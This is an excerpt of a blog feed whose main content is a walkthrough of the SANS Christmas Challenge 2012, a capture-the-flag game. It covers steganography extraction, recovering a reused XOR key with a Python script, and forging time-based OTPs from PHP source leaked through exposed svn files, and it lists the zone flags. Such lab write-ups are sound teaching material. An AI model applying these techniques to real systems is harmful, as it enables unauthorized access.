Star Wars, because every Jedi knight has to build its own light saber,
just like every CipherKnight should implement its own CipherSaber.&lt;/p&gt;
&lt;p&gt;I know I'm not from the US, and I know this web page was written ten
years ago, but I like the idea of being a part of some community, and
Internet ban concern everyone. That's why I've decided to revamp the
CipherKnight's certificate (the old one, in addition to being hard to
find, is too directed towards Americans).&lt;/p&gt;
&lt;p&gt;All you have to do to get your certificate is to enter your name, click
the button, and decipher it using your own CipherSaber (the encryption
key is &lt;em&gt;AlanTuring&lt;/em&gt;).&lt;/p&gt;
&lt;form action="/cscertificate/index.php" method="post"&gt;
     &lt;label for="name"&gt;Name&lt;/label&gt;: &lt;input name="name" type="text"&gt; &lt;input value="Get your certificate!" type="submit"&gt;
&lt;/form&gt;&lt;p&gt;If you're old school, you can get the former CipherKnight's certificate
&lt;a class="reference external" href="https://allyourbase.utouch.fr/wp-content/uploads/2014/08/cknight.cs1"&gt;here&lt;/a&gt;
(the encryption key is &lt;em&gt;ThomasJefferson&lt;/em&gt;).&lt;/p&gt;
&lt;p&gt;So go ahead, forge your own CipherSaber, print out your certificate, and
spread the word.&lt;/p&gt;
&lt;p&gt;May the Cipher be with you.&lt;/p&gt;
</content></entry><entry><title>SANS Christmas Challenge 2012</title><link href="https://allyourbase.utouch.fr/posts/2013/01/07/sans-christmas-challenge-2012/" rel="alternate"></link><published>2013-01-07T12:20:00+01:00</published><updated>2013-01-07T12:20:00+01:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2013-01-07:/posts/2013/01/07/sans-christmas-challenge-2012/</id><summary type="html">&lt;img alt="sans_christmas_challenge_2012_logo.jpg" class="align-center" src="/images/sans-christmas-challenge-2012/sans_christmas_challenge_2012_logo.jpg" /&gt;
&lt;p&gt;During December, SANS posted a &lt;a class="reference external" href="http://pen-testing.sans.org/holiday-challenge/2012"&gt;Christmas
challenge&lt;/a&gt; based
on a Christmas story.&lt;/p&gt;
&lt;p&gt;This year, Santa is sad because he feels that nobody believes in him
anymore, so he decides to cancel Christmas. Mrs. Claus wants to cheer
her husband up, in order not to let children down, but her reindeer …&lt;/p&gt;</summary><content type="html">&lt;img alt="sans_christmas_challenge_2012_logo.jpg" class="align-center" src="/images/sans-christmas-challenge-2012/sans_christmas_challenge_2012_logo.jpg" /&gt;
&lt;p&gt;During December, SANS posted a &lt;a class="reference external" href="http://pen-testing.sans.org/holiday-challenge/2012"&gt;Christmas
challenge&lt;/a&gt; based
on a Christmas story.&lt;/p&gt;
&lt;p&gt;This year, Santa is sad because he feels that nobody believes in him
anymore, so he decides to cancel Christmas. Mrs. Claus wants to cheer
her husband up, in order not to let children down, but her reindeer gets
imprisoned in Southtown's dog pound. The mayor accepts to let Vixen, the
reindeer, go if Mrs. Claus can make it snow in Southtown, which is a
relatively hot region.&lt;/p&gt;
&lt;p&gt;So Mrs. Claus goes to see Snow Miser, who is in charge of the cold
weather. Unfortunately, he refuses to make it snow in Southtown, because
it's in his brother's, Heat Miser, territory. But Heat Miser agrees to
make it snow in Southtown as long as he's allowed to melt the North
Pole. Unfortunately, the brothers are too stubborn, and refuse to let
each other have control over the other's territory. So Mrs. Claus takes
it to a higher authority: Mother Nature, who forces the brothers to
cooperate.&lt;/p&gt;
&lt;p&gt;Since they have to collaborate, Snow Miser and Heat Miser decide to
have a little fun and make it a competition: they both have to hack
every level of the other brother's weather control. You can follow
&lt;a class="reference external" href="https://twitter.com/sn0w_m1s3r"&gt;&amp;#64;sn0w_m1s3r&lt;/a&gt; and
&lt;a class="reference external" href="https://twitter.com/h34t_m1s3r"&gt;&amp;#64;h34t_m1s3r&lt;/a&gt; on Twitter.&lt;/p&gt;
&lt;p&gt;To make things interesting, SANS posted six questions, and will
reward the best answers:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;Where did you find the remainder of Snow Miser's Zone 1 URL?&lt;/li&gt;
&lt;li&gt;What is the key you used with steghide to extract Snow Miser's Zone 2
URL? Where did you find the key?&lt;/li&gt;
&lt;li&gt;On Snow Miser's Zone 3 page, why is using the same key multiple times
a bad idea?&lt;/li&gt;
&lt;li&gt;What was the coding error in Zone 4 of Heat Miser's site that allowed
you to find the URL for Zone 5?&lt;/li&gt;
&lt;li&gt;How did you manipulate the cookie to get to Zone 5 of Heat Miser's
Control System?&lt;/li&gt;
&lt;li&gt;Please briefly describe the process, steps, and tools you used to
conquer each zone, including all of the flags hidden in the comments
of each zone page.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I'll focus on the sixth question, while answering the first questions in
my write up.&lt;/p&gt;
&lt;div class="section" id="snow-miser"&gt;
&lt;h2&gt;&lt;a class="reference external" href="http://snowmiser.counterhack.com/"&gt;Snow Miser&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="zone-0"&gt;
&lt;h3&gt;Zone 0&lt;/h3&gt;
&lt;p&gt;flag: &lt;code&gt;3b5a630fc67251aa5555f4979787c93f&lt;/code&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Unlike my brother, my fridged minions (without freakish hair) didn't
mess up and leak our URLs to search engines or have to block them
from the search engines. There is no vulnerability to get to the
next zone and you will not find a vulnerability here. Move along.&lt;/p&gt;
&lt;p&gt;Those of you with proper access, the URL you need starts with the
following:&lt;/p&gt;
&lt;p&gt;zone-1-D2E31380-50E6-4869-8A85-XXXXXXXXXXXX&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The URL is composed only of digits (0 through 9) and letters (A through
F), which gives us 281.474.976.710.656 possible combinations. We can't
bruteforce so many combinations (plus, it's explicitly stated in the
challenge's rules that bruteforce is disallowed).&lt;/p&gt;
&lt;p&gt;Fortunately, Snow Miser tweets this message:&lt;/p&gt;
&lt;img alt="snow_miser_tweet_1.png" class="align-center" src="/images/sans-christmas-challenge-2012/snow_miser_tweet_1.png" /&gt;
&lt;p&gt;Here's the posted image:&lt;/p&gt;
&lt;img alt="snow_miser_glass_reflection.jpg" class="align-center" src="/images/sans-christmas-challenge-2012/snow_miser_glass_reflection.jpg" /&gt;
&lt;p&gt;We can see in the something interesting in the screen's reflection in
the glass: the end of the URL we're looking for. With a tool like GIMP,
we can manipulate the image to make it easier to read it:&lt;/p&gt;
&lt;img alt="snow_miser_glass_reflection_enhanced.jpg" class="align-center" src="/images/sans-christmas-challenge-2012/snow_miser_glass_reflection_enhanced.jpg" /&gt;
&lt;p&gt;Which gives us this final URL:
zone-1-D2E31380-50E6-4869-8A85-F9CDB3AF6226&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="zone-1"&gt;
&lt;h3&gt;Zone 1&lt;/h3&gt;
&lt;p&gt;flag: &lt;code&gt;38bef0b61ba8edda377b626fe6708bfa&lt;/code&gt;&lt;/p&gt;
&lt;blockquote&gt;
One of my minions, who has been turned into a snowman, messed up and
changed the URL for Zone 2. If you have access to this level you can
analyze the images and access the next zone.&lt;/blockquote&gt;
&lt;p&gt;This message kind of points to some sort of steganography use. This is
where the second question helps us. We know the program steghide was
used on a image. While looking at the website's images, we can see that
they're all PNG, except for &lt;a class="reference external" href="/images/sans-christmas-challenge-2012/off.jpg"&gt;this
one&lt;/a&gt;,
which is JPG. Since steghide doesn't support PNG, we know that the URL
is hidden in the last image.&lt;/p&gt;
&lt;p&gt;Now, we need to find the key, in order to extract the hidden file. If
you open the image in a hexadecimal editor, you'll find an ASCII string,
&amp;quot;IceIceBaby!&amp;quot;. Let's use it as the key:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;$ steghide extract -sf off.jpg
Enter passphrase: IceIceBaby!
Extracted data written to tmpfile.txt
$ cat tmpfile.txt
zone-2-6D46A633-25D7-42C8-AF94-8E786142A3E3
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="zone-2"&gt;
&lt;h3&gt;Zone 2&lt;/h3&gt;
&lt;p&gt;flag: &lt;code&gt;b8231c2bac801b54f732cfbdcd7e47b7&lt;/code&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The same minion that messed up the Zone 2 link also messed up the
Zone 3 link. Make sure you use the new link that starts with:&lt;/p&gt;
&lt;p&gt;zone-3-EAB6B031-4EFA-49F1-B542-XXXXXXXXXXXX&lt;/p&gt;
&lt;p&gt;Please do not tweet the links or parts of the links.&lt;/p&gt;
&lt;p&gt;All security issues that used to allow access to the next zone have
been fixed. There is no vulnerability to get to the next zone and
you will not find a vulnerability here. Move along.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Heat Miser kindly tweets:&lt;/p&gt;
&lt;img alt="heat_miser_tweet_2.png" class="align-center" src="/images/sans-christmas-challenge-2012/heat_miser_tweet_2.png" /&gt;
&lt;p&gt;You can retrieve Snow Miser's data
&lt;a class="reference external" href="/docs/sans-christmas-challenge-2012/android.data_.tar.gz"&gt;here&lt;/a&gt;
(sha256:
&lt;code&gt;286387c77b533aae4d605d85a5e74c819f3e0ca7ca42b991ddd29abf9ff5a6b4&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;After extracting it, we can use some shell mojo to find files mentioning
the zone 3 URL:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;$ tar -xzvf android.data.tgz
$ &lt;span class="nb"&gt;cd&lt;/span&gt; data
$ grep -Rn &lt;span class="s2"&gt;&amp;quot;zone-3&amp;quot;&lt;/span&gt; . &lt;span class="m"&gt;2&lt;/span&gt;&amp;gt; /dev/null
Binary file ./data/com.android.browser/cache/browser_state.parcel
concordant
Binary file
./data/com.android.browser/cache/webviewCacheChromium/data_1 concordant
Binary file
./data/com.android.browser/cache/webviewCacheChromium/data_2 concordant
Binary file ./data/com.android.browser/databases/browser2.db
concordant
Binary file ./data/com.android.browser/databases/browser2.db-wal
concordant
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The first file looks is a browser cache file, which may contain the
wanted URL. By reading it, we'll find:
zone-3-EAB6B031-4EFA-49F1-B542-30EBE9EB3962&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="zone-3"&gt;
&lt;h3&gt;Zone 3&lt;/h3&gt;
&lt;p&gt;flag: &lt;code&gt;08ba610172aade5d1c8ea738013a2e99&lt;/code&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;To reduce the impact of URL exposure or modification we have added a
new mechanism to distribute changes to the URL (thanks to that
minion that broke Zones 2+). Those of you with with access to Zone 4
should have received an encryption key. This key can be used to
decrypt the URL for Zone 4. This allows us to securely communicate
it to you without risk of unauthorized access.&lt;/p&gt;
&lt;p&gt;To verify your key you can check the previous Zone 4 URL:&lt;/p&gt;
&lt;p&gt;zone-4-F7677DA8-3D77-11E2-BB65-E4BF6188709B&lt;/p&gt;
&lt;p&gt;20d916c6c29ee53c30ea1effc63b1c72147eb86b998a25c0cf1bf66939e8621b3132d83abb1683df619238&lt;/p&gt;
&lt;p&gt;The new Zone 4 encrypted string is:
20d916c6c29ee54343e81ff1b14c1372650cbf19998f51b5c51bf66f49ec62184034a94fc9198fa9179849&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We know the cipher texts both encrypt plain texts starting with zone-4-,
and by looking at them, we can see that they both start with the same
letters. It hints to a bytewise encryption scheme. It turns out that
it's a XOR encryption. The first &amp;quot;oops&amp;quot; here, is that since we're given
a plain text and its cipher text, we can recover the whole key. Indeed,
by the propriety of the XOR operator (here denoted by &lt;span class="formula"&gt;⊕&lt;/span&gt;):&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;span class="formula"&gt;&lt;i&gt;c&lt;/i&gt; = &lt;i&gt;k&lt;/i&gt;⊕&lt;i&gt;p&lt;/i&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class="formula"&gt;&lt;i&gt;c&lt;/i&gt;⊕&lt;i&gt;p&lt;/i&gt; = &lt;i&gt;k&lt;/i&gt;⊕&lt;i&gt;p&lt;/i&gt;⊕&lt;i&gt;p&lt;/i&gt; = &lt;i&gt;k&lt;/i&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The second &amp;quot;oops&amp;quot; is using the same key twice, because now that we have
the key, we can decrypt the second cipher text:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/python&lt;/span&gt;
&lt;span class="c1"&gt;#-*- encoding: Utf-8 -*-&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;usage: &lt;/span&gt;&lt;span class="si"&gt;%s&lt;/span&gt;&lt;span class="s1"&gt; &amp;#39;&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;

    &lt;span class="n"&gt;plain1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cipher1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cipher2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:]&lt;/span&gt;
    &lt;span class="n"&gt;plain2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;xrange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;plain1&lt;/span&gt;&lt;span class="p"&gt;)):&lt;/span&gt;
        &lt;span class="n"&gt;plain2&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="nb"&gt;chr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;ord&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;plain1&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="o"&gt;^&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipher1&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;^&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipher2&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="n"&gt;plain2&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now let's launch this program:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;$ ls
xor_encrypt.py
$ ./xor_enc.py zone-4-F7677DA8-3D77-11E2-BB65-E4BF6188709B
20d916c6c29ee53c30ea1effc63b1c72147eb86b998a25c0cf1bf66939e8621b3132d83abb1683df619238
20d916c6c29ee54343e81ff1b14c1372650cbf19998f51b5c51bf66f49ec62184034a94fc9198fa9179849
zone-4-9D469367-B60E-4E08-BDF1-FED7CC74AF33
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="zone-4"&gt;
&lt;h3&gt;Zone 4&lt;/h3&gt;
&lt;p&gt;flag: &lt;code&gt;de32b158f102a60aba7de3ee8d5d265a&lt;/code&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Zone 5 requires top security. We are updating the code using svn 1.7
and have implemented One-Time-Password (OTP) functionality to access
Zone 5.&lt;/p&gt;
&lt;p&gt;The passwords are in a SHA1 format, so they are unguessable.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If we look at the source code, we can see that the One Time Password is
sent to the zone 5 URL, so we don't have to look very far to find it.
But if we try to access it directly, we're redirected to a page,
noaccess.php. With this tweet, Heat Miser gives us a big hint:&lt;/p&gt;
&lt;img alt="heat_miser_tweet_3.png" class="align-center" src="/images/sans-christmas-challenge-2012/heat_miser_tweet_3.png" /&gt;
&lt;p&gt;By looking at &lt;a class="reference external" href="http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us"&gt;the tutorial he
gives&lt;/a&gt;
(see, this meme doesn't get old!) we can get the index page source code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;generate_otp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$time&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$pass&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;sha1&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="si"&gt;$time&lt;/span&gt;&lt;span class="s2"&gt; 7998f77a7dc74f182a76219d7ee58db38be3841c&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pass&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;verify_otp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$inpass&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;// passwords are valid for up to 3 minutes&lt;/span&gt;
        &lt;span class="c1"&gt;// don&amp;#39;t forget to use the server time (see the noaccess.php page)&lt;/span&gt;
        &lt;span class="nv"&gt;$validstamps&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="nb"&gt;date&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Y-m-d H:i&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;strtotime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;+1 minute&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)),&lt;/span&gt; &lt;span class="c1"&gt;// added just in case the time sync is off&lt;/span&gt;
            &lt;span class="nb"&gt;date&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Y-m-d H:i&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
            &lt;span class="nb"&gt;date&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Y-m-d H:i&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;strtotime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;-1 minute&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)),&lt;/span&gt;
            &lt;span class="nb"&gt;date&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Y-m-d H:i&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;strtotime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;-2 minute&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)),&lt;/span&gt;
        &lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$validstamps&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nv"&gt;$stamp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;strtolower&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$inpass&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nx"&gt;generate_otp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$stamp&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
                &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="k"&gt;TRUE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="k"&gt;FALSE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nb"&gt;array_key_exists&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;otp&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt;
        &lt;span class="nx"&gt;verify_otp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_POST&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;otp&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;array_key_exists&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;otp&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$_COOKIE&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;verify_otp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_COOKIE&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;otp&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;])))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nb"&gt;setcookie&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;otp&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;generate_otp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;date&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Y-m-d H:i&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)));&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nb"&gt;header&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Location: noaccess.php&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;die&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="nv"&gt;$accessallowed&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;TRUE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nv"&gt;$zone&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;require_once&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;../include/template.inc.php&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;&lt;span class="x"&gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now we know how the One Time Passwords are generated. We just have to
send the correct SHA1 sum, using the server's current time, which we can
find in the source code of the noaccess.php page.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="zone-5"&gt;
&lt;h3&gt;Zone 5&lt;/h3&gt;
&lt;p&gt;flag: &lt;code&gt;3ab1c5fa327343721bc798f116be8dc6&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Game over for the North Pole.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="heat-miser"&gt;
&lt;h2&gt;&lt;a class="reference external" href="http://heatmiser.counterhack.com/"&gt;Heat Miser&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="id1"&gt;
&lt;h3&gt;Zone 0&lt;/h3&gt;
&lt;p&gt;flag: &lt;code&gt;1732bcff12e6550ff9ea44d594001418&lt;/code&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We had a security concern where the Zone 1 URL ended up in search
engine results. We added a file to prevent the search engines from
caching these pages. The system is now secure an no unauthorized
users have access to the URL.&lt;/p&gt;
&lt;p&gt;Don't even try to access the other zones, because you won't be able
to. And if you are helping my brother, GO AWAY!&lt;/p&gt;
&lt;/blockquote&gt;
